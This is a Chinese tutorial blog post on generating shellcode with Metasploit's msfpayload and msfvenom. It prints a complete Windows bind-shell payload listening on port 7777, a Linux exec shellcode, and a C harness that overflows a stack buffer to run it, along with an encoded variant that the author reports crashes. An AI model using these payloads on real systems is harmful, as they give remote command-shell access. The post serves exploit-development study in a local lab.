基本的栈溢出搞明白了,真实攻击中一个很重要的问题是shellcode生成。

利用Metasploit提供的工具,可以方便的生成shellcode,然后可以使用第一篇中的代码进行验证。

先说一下如何生成shellcode(都是在bt5下生成)。

例子参考来源于:http://www.offensive-security.com/metasploit-unleashed/Msfpayload

查看可用payload:

root@kali:~# msfpayload -l

Framework Payloads ( total)
============================== Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell ...snip...
...snip... windows/x64/shell/bind_tcp Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
windows/x64/shell/reverse_tcp Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
windows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)
windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)
windows/x64/vncinject/bind_tcp Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
windows/x64/vncinject/reverse_tcp Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)

查看具体payload参数配置:

root@kali:~# msfpayload windows/shell_bind_tcp o

       Name: Windows Command Shell, Bind TCP Inline
Module: payload/windows/shell_bind_tcp
Version:
Platform: Windows
Arch: x86
Needs Admin: No
Total size:
Rank: Normal Provided by:
vlad902
sf Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LPORT yes The listen port
RHOST no The target address Description:
Listen for a connection and spawn a command shell

最后生成shellcode,以上面例子为例,生成c语言可用shellcode:

root@bt:~# msfpayload windows/shell_bind_tcp LPORT= C
/*
* windows/shell_bind_tcp - 341 bytes
* http://www.metasploit.com
* VERBOSE=false, LPORT=7777, RHOST=, EXITFUNC=process,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x1e\x61\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

当然我们实在linux环境下,需要生成的linux相关shellcode,那么我们以exec payload来生成shellcode:

root@bt:~# msfpayload  linux/x86/exec CMD=ls C
/*
* linux/x86/exec - 38 bytes
* http://www.metasploit.com
* VERBOSE=false, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependChrootBreak=false, AppendExit=false, CMD=ls
*/
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
"\x73\x00\x57\x53\x89\xe1\xcd\x80";

好,现在我们就可以在上一节的shell.c中进行验证

 #include<unistd.h>

 unsigned char large_string[];
/*
* linux/x86/exec - 38 bytes
* http://www.metasploit.com
* VERBOSE=false, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependChrootBreak=false, AppendExit=false, CMD=ls
*/
unsigned char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
"\x73\x00\x57\x53\x89\xe1\xcd\x80"; void main() {
char buffer[];
int i;
long *long_ptr = (long *) large_string;
for (i = ; i < sizeof(large_string)/sizeof(int); i++)
*(long_ptr + i) = (int) buffer; for (i = ; i < sizeof(shellcode); i++)
large_string[i] = shellcode[i];
memcpy(buffer,large_string,sizeof(large_string));
}

请注意25行,我使用了memcpy替换了strcpy,因为生成的shellcode中有不少00.

同样使用命令编译生成验证:

bai@ubuntu:/mnt/hgfs/r/stack$ gcc -fno-stack-protector -z execstack -g -o shell shell.c
bai@ubuntu:/mnt/hgfs/r/stack$ ./shell

关于如何避免shellcode中包含00,可以使用msfvenom,还以上面的例子为例:

root@bt:~# msfvenom  -p linux/x86/exec CMD=ls -e x86/shikata_ga_nai -b '\x00' -f c
[*] x86/shikata_ga_nai succeeded with size (iteration=)
unsigned char buf[] =
"\xdb\xd6\xd9\x74\x24\xf4\xbb\xe3\xa4\x6b\x7e\x58\x2b\xc9\xb1"
"\x0a\x83\xc0\x04\x31\x58\x15\x03\x58\x15\x01\x51\x01\x75\x9d"
"\x03\x84\xef\x75\x19\x4a\x79\x62\x09\xa3\x0a\x04\xca\xd3\xc3"
"\xb6\xa3\x4d\x95\xd5\x66\x7a\xa6\x19\x87\x7a\xc5\x6a\x87\x2d"
"\x46\x05\x66\x1c\xe8";

但是有个问题,生成的shellcode无法利用,会把illegal instruction,引起core dump,不明原因。

最新文章

  1. 如何在ASP.NET Core中使用Redis
  2. github for window的代理设置方法
  3. JS数组转成json字符串的注意事项
  4. 最新php一句话木马
  5. Adobe flash player更新失败
  6. 关于华为C8812救砖教程
  7. Steady Cow Assignment
  8. mysql sql_mode 之 NO_ENGINE_SUBSTITUTION
  9. HDU1029时钟(排序)
  10. 笔记:Struts2 拦截器
  11. 下载android4.4.2源码全过程(附已下载的源码)
  12. ef和mysql使用(一)
  13. shell练习题1
  14. C#框架类
  15. 26.Odoo产品分析 (三) – 人力资源板块(6) – 工资表(2)
  16. Python socket文件传送md5校验
  17. 【Beta版本发布】爬虫队长装备全面更新!
  18. spring处理线程并发
  19. MyBatis学习之多表查询
  20. ny737 石子合并(一) 总结合并石子问题

热门文章

  1. linux 内核移植和根文件系统的制作【转载】
  2. ubuntu nfs server config
  3. BZOJ4130:[PA2011]Kangaroos
  4. DataX安装环境搭建
  5. ov2640数据
  6. iOS 模块分解— Runtime
  7. chromium浏览器开发系列第二篇:如何编译最新chromium
  8. Pandoc+markdown生成slides
  9. python笔记--3--函数、生成器、装饰器、函数嵌套定义、函数柯里化
  10. FTP 命令 上传下载